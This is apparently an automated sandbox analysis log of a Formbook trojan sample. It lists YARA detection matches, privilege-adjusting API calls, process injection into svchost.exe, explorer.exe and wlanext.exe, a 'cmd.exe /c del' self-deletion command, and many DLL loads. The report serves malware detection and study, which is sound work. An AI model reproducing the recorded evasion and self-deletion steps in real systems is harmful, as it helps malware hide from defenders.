          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: file.exe PID: 5324, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: wlanext.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/11@6/3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0CE7A GetLastError,FormatMessageW,0_2_00F0CE7A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFAB84 AdjustTokenPrivileges,CloseHandle,0_2_00EFAB84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EFB134
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DD3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,4_2_00DD3355
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F0E1FD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F06532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00F06532
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00F1C18C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EC406B
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.dbJump to behavior
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\autBFC.tmpJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.graphics.display.displaycolormanagement.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
